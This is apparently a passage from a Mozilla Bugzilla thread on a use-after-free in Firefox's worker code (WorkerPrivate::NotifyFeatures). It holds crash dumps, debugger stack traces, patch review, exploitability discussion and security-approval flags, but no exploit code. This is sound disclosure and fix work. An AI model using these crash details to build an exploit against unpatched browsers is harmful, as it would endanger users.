  0x0c108004afe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c108004aff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       [1==7524==ABORTING
Summary: Console - Memory corruption in WorkerPrivate::NotifyFeatures() → Console - Use After Free in WorkerPrivate::NotifyFeatures()
Group: core-security → dom-core-security
Attachment #8746309 - Attachment mime type: text/plain → text/html
I couldn't reproduce on today's Mac Nightly build (4/28). Haven't tried ASAN or Linux, though.
Flags: sec-bounty?
Reproduced it with the same test case in today's nightly on Win10:

Firefox version 49.0a1 (2016-04-28)

(7e94.3630): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1056adb0 ebx=22cff2f8 ecx=2041d138 edx=00000001 esi=232aaaf0 edi=232aa800
eip=2268e7a0 esp=22cff2a0 ebp=22cff2f0 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch ss:002b:b8901601=??
0:076> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll - 

FAULTING_IP: 
+0
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 2268e7a0
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 2268e7a0
Attempt to execute non-executable address 2268e7a0

FAULTING_THREAD:  00003630

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  2268e7a0

WRITE_ADDRESS:  2268e7a0 

FOLLOWUP_IP: 
xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp @ 5267]
02f715db 8b75fc          mov     esi,dword ptr [ebp-4]

FAILED_INSTRUCTION_ADDRESS: 
+0
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch

BUGCHECK_STR:  SOFTWARE_NX_FAULT_SEHOP

NTGLOBALFLAG:  400

APPLICATION_VERIFIER_FLAGS:  0

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 x86fre

IP_ON_HEAP:  2268e7a0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

LAST_CONTROL_TRANSFER:  from 02f715db to 2268e7a0

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
22cff29c 02f715db 00000004 00000004 00000000 0x2268e7a0
22cff2f0 029060a8 232aa800 029060a8 00000000 xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+0x66afa1
22cff378 02906037 1cf8a020 00000004 22cff498 xul!mozilla::dom::workers::WorkerPrivate::NotifyInternal+0x6d
22cff388 029d4c38 13496d80 232aa800 1cf8a020 xul!`anonymous namespace'::NotifyRunnable::WorkerRun+0xf
22cff498 02ad4a9e 1cf8a020 232aaa70 1c2cfe70 xul!mozilla::dom::workers::WorkerRunnable::Run+0x139
22cff4b8 02cf3693 1cf8a180 116b8000 13496d80 xul!mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked+0x4f
22cff54c 02a7cccd 13496d80 00000000 00000000 xul!mozilla::dom::workers::WorkerPrivate::DoRunLoop+0xbf
22cff704 02980c59 1cf8a180 2252c800 22cff701 xul!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x120
22cff778 0297fdd9 225fedc0 22cff701 22cff793 xul!nsThread::ProcessNextEvent+0x198
22cff794 028eb72d 2252c800 2252c800 0f9ab4d0 xul!NS_ProcessNextEvent+0x16
22cff7b4 028eb621 0052c800 2a16d274 2252c800 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xc4
22cff7ec 028eb5f0 225fedc0 00000001 0f9ab400 xul!MessageLoop::RunHandler+0x20
22cff80c 028eb8f1 00d0e350 20debac0 20debac0 xul!MessageLoop::Run+0x19
22cff82c 0f9aa739 225fedc0 17f64c18 0f9aa3fb xul!nsThread::ThreadFunc+0xa6
22cff848 0f9aa408 20debac0 22cff890 6e2362a4 nss3!_PR_NativeRunThread+0x9a
22cff854 6e2362a4 20debac0 40e7c43b 6e236250 nss3!pr_root+0xd
22cff890 76b838f4 17f64c18 76b838d0 59507bd5 ucrtbase!_crt_at_quick_exit+0x104
22cff8a4 77b35de3 17f64c18 582fe804 00000000 KERNEL32!BaseThreadInitThunk+0x24
22cff8ec 77b35dae ffffffff 77b5b7e6 00000000 ntdll!__RtlUserThreadStart+0x2f
22cff8fc 00000000 6e236250 17f64c18 00000000 ntdll!_RtlUserThreadStart+0x1b


FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp

FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp

FAULTING_SOURCE_LINE_NUMBER:  5267

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: xul

IMAGE_NAME:  xul.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  57220148

STACK_COMMAND:  ~76s ; kb

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP_c0000005_xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures

BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP_BAD_IP_xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_SEHOP_BAD_IP_xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

FAILURE_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_SEHOP

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  xul.dll

FAILURE_FUNCTION_NAME:  mozilla::dom::workers::WorkerPrivate::NotifyFeatures

FAILURE_SYMBOL_NAME:  xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:software_nx_fault_sehop_c0000005_xul.dll!mozilla::dom::workers::workerprivate::notifyfeatures

FAILURE_ID_HASH:  {aef95975-6804-bb68-4f0d-f5e014881608}

Followup:     MachineOwner
---------
Assignee: nobody → amarchesini
Attached patch crash2.patchSplinter Review
Attachment #8746967 - Flags: review?(bugs)
Whiteboard: btpp-active
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

Did someone already end up filing the bug to fix features handling in more generic way?

(it might be tad nicer to make Cancel to call RemoveFeature, but up to you)
Attachment #8746967 - Flags: review?(bugs) → review+
> Did someone already end up filing the bug to fix features handling in more
> generic way?

Yes, bug 1269154
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

This is just a null pointer used after free. I don't think it can be exploited.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

Not really. It just moves RemoveFeature() call in another method.

Which older supported branches are affected by this flaw?

m-i and m-a.

If not all supported branches, which bug introduced the flaw?

bug 1263392

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Probably it's not needed. This patch should apply to m-a.

How likely is this patch to cause regressions; how much testing does it need?

No regressions.
Attachment #8746967 - Flags: sec-approval?
(In reply to Andrea Marchesini (:baku) from comment #8)
> This is just a null pointer used after free. I don't think it can be
> exploited.

Do you mean that the object is destroyed, then immediately a null is stored into it?
I don't see how this is a null pointer crash. Anything related to worker features tend to be UAF.
(In reply to Olli Pettay [:smaug] from comment #10)
> I don't see how this is a null pointer crash. Anything related to worker
> features tend to be UAF.

Sorry, I wrote the comment completely wrongly. I meant that the feature pointer is used after free.
But I still think it's not possible to exploit it. Am I wrong?
(In reply to Andrea Marchesini (:baku) from comment #11)
> (In reply to Olli Pettay [:smaug] from comment #10)
> > I don't see how this is a null pointer crash. Anything related to worker
> > features tend to be UAF.
> 
> Sorry, I wrote the comment completely wrongly. I meant that the feature
> pointer is used after free.
> But I still think it's not possible to exploit it. Am I wrong?

Thanks Andrea for the prompt fix.

I guess what you really mean by "not possible to exploit " is not "this issue is not exploitable" but rather: it's extremely hard to deduce it's an Use After Free with worker feature and reconstruct the test case  by  merely inspecting the code change of this patch.
We need a security rating before we know if it needs sec-approval (And before we can say how bad this is). Only sec-high and sec-critical bugs need sec-approval.

Is this really a UAF affecting Firefox?
It is:

==7524==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000297d38 at pc 0x7f33feac5f04 bp 0x7f33ba75b870 sp 0x7f33ba75b868
READ of size 8 at 0x608000297d38 thread T50 (DOM Worker)
    #0 0x7f33feac5f03 in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207
I'll just be conservative and mark it sec-high...
Setting flags since this is trunk and Aurora only. We'll want this nominated for aurora after it goes into trunk. 

sec-approval+
Attachment #8746967 - Flags: sec-approval? → sec-approval+
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

Approval Request Comment
[Feature/regressing bug #]: bug 1263392
[User impact if declined]: FF could crash.
[Describe test coverage new/current, TreeHerder]: no tests, it's a race condition.
[Risks and why]: No big risks. We are just moving the unregistration of the feature so that Cancel() and Run() behave both correctly. 
[String/UUID change made/needed]: none
Attachment #8746967 - Flags: approval-mozilla-aurora?
https://hg.mozilla.org/mozilla-central/rev/f769bd4f0bfd
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla49
Flags: sec-bounty? → sec-bounty+
Can you nominate an Aurora patch?
Flags: needinfo?(amarchesini)
Blocks: 1263392
Keywords: regression
Attachment #8746967 - Flags: approval-mozilla-aurora? → approval-mozilla-aurora+
Do I need to do anything here? This patch should apply to m-a. In case, let me know and I can provide a new version of the patch quickly.
Flags: needinfo?(amarchesini)
Group: dom-core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.